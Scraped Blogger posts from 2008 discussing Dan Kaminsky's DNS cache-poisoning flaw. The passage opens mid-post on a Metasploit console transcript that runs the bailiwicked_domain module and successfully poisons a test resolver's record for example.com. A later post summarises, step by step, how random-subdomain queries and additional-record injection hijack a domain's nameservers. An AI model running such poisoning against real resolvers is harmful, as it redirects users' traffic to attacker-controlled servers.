A.B.C.D<br />RHOST => A.B.C.D<br />msf auxiliary(bailiwicked_domain) > set DOMAIN example.com<br />DOMAIN => example.com<br />msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com<br />NEWDNS => dns01.metasploit.com<br />msf auxiliary(bailiwicked_domain) > set SRCPORT 0<br />SRCPORT => 0<br />msf auxiliary(bailiwicked_domain) > check<br />[*] Using the Metasploit service to verify exploitability...<br />[*] >> ADDRESS: A.B.C.D PORT: 50391<br />[*] >> ADDRESS: A.B.C.D PORT: 50391<br />[*] >> ADDRESS: A.B.C.D PORT: 50391<br />[*] >> ADDRESS: A.B.C.D PORT: 50391<br />[*] >> ADDRESS: A.B.C.D PORT: 50391<br />[*] FAIL: This server uses static source ports and is vulnerable to poisoning<br />msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D<br />[*] exec: dig +short -t ns example.com @A.B.C.D<br /><br />b.iana-servers.net.<br />a.iana-servers.net.<br /><br />msf auxiliary(bailiwicked_domain) > run<br />[*] Switching to target port 50391 based on Metasploit service<br />[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com<br />[*] Querying recon nameserver for example.com.'s nameservers...<br />[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.<br />[*] Querying recon nameserver for address of b.iana-servers.net....<br />[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236<br />[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....<br />[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as<br />[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.<br />[*] Querying recon nameserver for address of a.iana-servers.net....<br />[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43<br />[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....<br />[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as<br />[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...<br />[*] Sent 1000 queries and 20000 spoofed responses...<br />[*] Sent 2000 queries and 40000 spoofed responses...<br />[*] Sent 3000 queries and 60000 spoofed responses...<br />[*] Sent 4000 queries and 80000 spoofed responses...<br />[*] Sent 5000 queries and 100000 spoofed responses...<br />[*] Sent 6000 queries and 120000 spoofed responses...<br />[*] Sent 7000 queries and 140000 spoofed responses...<br />[*] Sent 8000 queries and 160000 spoofed responses...<br />[*] Sent 9000 queries and 180000 spoofed responses...<br />[*] Sent 10000 queries and 200000 spoofed responses...<br />[*] Sent 11000 queries and 220000 spoofed responses...<br />[*] Sent 12000 queries and 240000 spoofed responses...<br />[*] Sent 13000 queries and 260000 spoofed responses...<br />[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com<br />[*] Auxiliary module execution completed<br /><br />msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D<br />[*] exec: dig +short -t ns example.com @A.B.C.D<br /><br />dns01.metasploit.com.Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com2tag:blogger.com,1999:blog-8542235839869152787.post-76866730310959649672008-07-22T08:53:00.000-07:002008-07-25T15:18:44.570-07:00More info on DNS Hierarchy and determining bailiwickAnyone interested in reading more on how DNS zones and heirarchies ("bailiwick") are determined, check these articles from linuxjournal.com:<br /><br /><a href="http://www.linuxjournal.com/article/9905">Digging Up Dirt in the DNS Hierarchy, Part I</a><br /><a href="http://www.linuxjournal.com/article/9928">Digging Up Dirt in the DNS Hierarchy, Part II</a><br /><br />It should clear it up for anyone still confused about how DNS is supposed to function and why the current protections (pre-Kaminsky) were put in place.Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com0tag:blogger.com,1999:blog-8542235839869152787.post-13714080395884001452008-07-21T15:05:00.000-07:002008-07-22T09:11:21.081-07:00Kaminsky's DNS Issue Accidentally Leaked?[Update 2: Thomas Ptacek of Matasano has since posted a public apology to Dan et al for the accidental postage. <a href="http://www.matasano.com/log/1105/regarding-the-post-on-chargen-earlier-today/">Regarding The Post On Chargen Earlier Today</a>.]<br /><br />[Update 1: Upon re-reading Halvar's explanation, it appears he got it closer than I originally thought, missing only the part about "bailiwick checking", which prevents a request for arbitrary.invisibledenizen.org from poisoning ns1.google.com. Halvar's solution, as written, would fail as I understand it. But one minor change (to using subdomains) makes it all function.]<br /><br />It appears matasano <a href="http://www.matasano.com/log/1103/reliable-dns-forgery-in-2008-kaminskys-discovery/">posted an explanation</a> of Dan Kaminsky's <a href="http://securosis.com/2008/07/08/dan-kaminsky-discovers-fundamental-issue-in-dns-massive-multivendor-patch-released/">DNS issue</a> to their blog today, but looks like it may have been yanked back down. My google reader account nabbed it via the RSS feed while it was up.<br /><br />It looks like maybe they had this typed up, ready to hit "post" as soon as someone else figured it out? They had advance knowledge of the issue via conference calls with Kaminsky, and when Halvar Flake <a href="http://addxorrol.blogspot.com/2008/07/on-dans-request-for-no-speculation.html">posted some speculation</a> on what the issue was, they referred to Halvar's post and their explanation hit the matasano blog. But Halvar's speculation was not the full issue; only a re-hash of previously known issues. Halvar's ideas were close, but incomplete. Matasano filled in the missing details, possibly by accident. :)<br /><br />Rather than re-post their entire section and get crossways with copyright complaints, here's a summary of their explanation:<br /><br /><ol><li>There's a general principle of cryptography that says if you have to guess Variable A, it's incredibly helpful to be able to make as many iterations of variable A as possible. (See wikipedia's <a href="http://en.wikipedia.org/wiki/Birthday_attack">entry</a> on "birthday attack" or <a href="http://www.google.com/search?hl=en&q=%22birthday+attack%22">google</a> for more details.)<br /></li><li>DNS only uses a random 16-bit transaction ID that must be guessed in order to poison a DNS server's cache, and it must be guessed before the legitimate answer comes back. This is difficult to do on any individual requests scale.<br /></li><li>If you can slam a server with tons of requests, Point 1 above comes into play and allows you to reliably and quickly get at least 1 DNS cache poisoning packet to match the transaction ID. (Halvar's guess said this: force requests for random0000001.com, random0000002.com, etc, to generate a large amount of Variable A's. Eventually you'll guess one right.)</li><li>This is obviously not very helpful. So what if I can poison bankofamerica349543.com.</li><li>OK, so what about <a href="http://en.wikipedia.org/wiki/Wildcard_DNS_record">DNS wildcards</a>? If you are able to poison random00001.invisibledenizen.org, what does that get you? Enter the <a href="http://en.wikipedia.org/wiki/DNS_cache_poisoning#Redirect_the_target_domain.27s_nameserver">additional RR set</a> field. This allows you to piggy back additional DNS responses in addition to what was requested. For security reasons, you can only respond with additional answers for addresses that match the same domain. (E.g., if I submit a request for arbitrary.domain.com, the additional response section can only return info for domain.com sub-domains.)<br /></li><li>So the attack is this: do the above to cache poison randomXXXX.invisibledenizen.org, and in each packet have the additional RR return answers for ns1.invisibledenizen.org. Whenever random42156.invisibledenizen.org is the magical response that finds the transaction ID and poisons the cache, it will also poison the record for my nameserver, ns1.invisibledenizen.org.</li></ol>Matasona stated this attack could occur in "less than 10 seconds" with current internet speeds.<br /><br />Anyone want to throw together a metasploit aux module for this?<br /><br />:)<br /><br />-NNathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com10